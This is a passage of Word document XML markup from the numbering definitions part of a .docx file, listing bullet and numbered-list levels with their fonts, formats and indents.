        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2037" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2457" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2877" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3297" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3717" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4137" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4557" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="28">
    <w:nsid w:val="2E176716"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF68FA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nsid w:val="2E412332"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EFF888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nsid w:val="305B4B97"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B42BA72"/>
    <w:lvl w:ilvl="0" w:tplc="04090003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="835" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1255" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1675" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2095" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2515" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2935" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3355" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3775" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4195" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="31">
    <w:nsid w:val="3421200A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C602C6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nsid w:val="351A5F7E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="51D48C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nsid w:val="35A379C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C70E11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36AE62B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6CE40868"/>
    <w:lvl w:ilvl="0" w:tplc="3C8ACB4A">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5">
    <w:nsid w:val="39C276F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7430D5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3D965578"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="62FCE1CA"/>
    <w:lvl w:ilvl="0" w:tplc="04090003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1261" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1681" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2101" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2521" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2941" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3361" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3781" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4201" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4621" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="37">
    <w:nsid w:val="3EEF1146"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CF50BE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nsid w:val="3FE73564"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C8A2F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nsid w:val="401E7850"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1B475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nsid w:val="41C743BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01C2DD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4244652C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D87823BE"/>
    <w:lvl w:ilvl="0" w:tplc="E4F0579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2">
    <w:nsid w:val="43281B51"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1BEA4830"/>
    <w:lvl w:ilvl="0" w:tplc="C4BE2790">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1035" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1515" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1935" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2355" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2775" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3195" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3615" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4035" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4455" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="43">
    <w:nsid w:val="455803D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63D099A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nsid w:val="465615BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E78A1D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nsid w:val="46F30DEA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4ECC0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nsid w:val="46F619D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A448E8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nsid w:val="47247B41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="233C0CC8"/>
    <w:lvl w:ilvl="0" w:tplc="76421D58">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="675" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1155" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1575" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1995" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2415" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2835" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3255" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3675" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4095" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="48">
    <w:nsid w:val="476D6990"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D4C0462E"/>
    <w:lvl w:ilvl="0" w:tplc="5D2A6952">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49">
    <w:nsid w:val="476E07BF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF74447A"/>
    <w:lvl w:ilvl="0" w:tplc="04090003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1261" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1681" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2101" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2521" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2941" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3361" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3781" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4201" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4621" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="50">
    <w:nsid w:val="47B07ABE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="621667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nsid w:val="49E04F6B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B0AEA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nsid w:val="4A6E2BEF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7452F3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nsid w:val="4B4F6098"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09A0C2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nsid w:val="4F68141F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="57FCDD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nsid w:val="5137650B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25F20D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nsid w:val="52247BD6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="358CAA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
    <w:nsid w:val="533B4F51"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="455C50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nsid w:val="539C5826"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF029B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nsid w:val="545625F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD6C70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nsid w:val="548B1AC3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A71418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nsid w:val="569D0C7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="387C5DF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2">
    <w:nsid w:val="58A21012"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8FD42D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nsid w:val="59E621E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDB2B7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nsid w:val="5AB068FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09E600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nsid w:val="5B30000B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="877E52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nsid w:val="5CBF4BFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D22A44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nsid w:val="5CEA4044"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65D035B0"/>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nsid w:val="5DE01AEE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE3A62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nsid w:val="5FC55D51"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48E866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nsid w:val="60AB417C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C73E41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nsid w:val="62634687"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F776FB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nsid w:val="660A62A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CCAED2AC"/>
    <w:lvl w:ilvl="0" w:tplc="B3487452">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73">
    <w:nsid w:val="663F5CEE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE5850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nsid w:val="668C4A29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5A4FB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nsid w:val="66A76294"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="093A5C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nsid w:val="679B7483"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="494402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nsid w:val="68387E9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CC6F1B0"/>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nsid w:val="68444111"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C88C55A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79">
    <w:nsid w:val="68CD3BF1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF4EC0CA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="585" w:hanging="585"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="12"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="585" w:hanging="585"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="585" w:hanging="585"/>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720" w:hanging="72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080" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="80">
    <w:nsid w:val="69E36673"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A1A6F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nsid w:val="6A1E4E69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8AB0EC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nsid w:val="6AB0283E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="14240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3">
    <w:nsid w:val="6B3645C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00C853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nsid w:val="6B781915"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0024A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5">
    <w:nsid w:val="6BD237B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D0C28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6">
    <w:nsid w:val="6D214AFE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8294FC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nsid w:val="6D45467F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="730E3F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nsid w:val="70C32A36"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="060AF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nsid w:val="712A381C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="911A2D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nsid w:val="71577827"/>
    <w:multiLevelType w:val="multilevel"/>
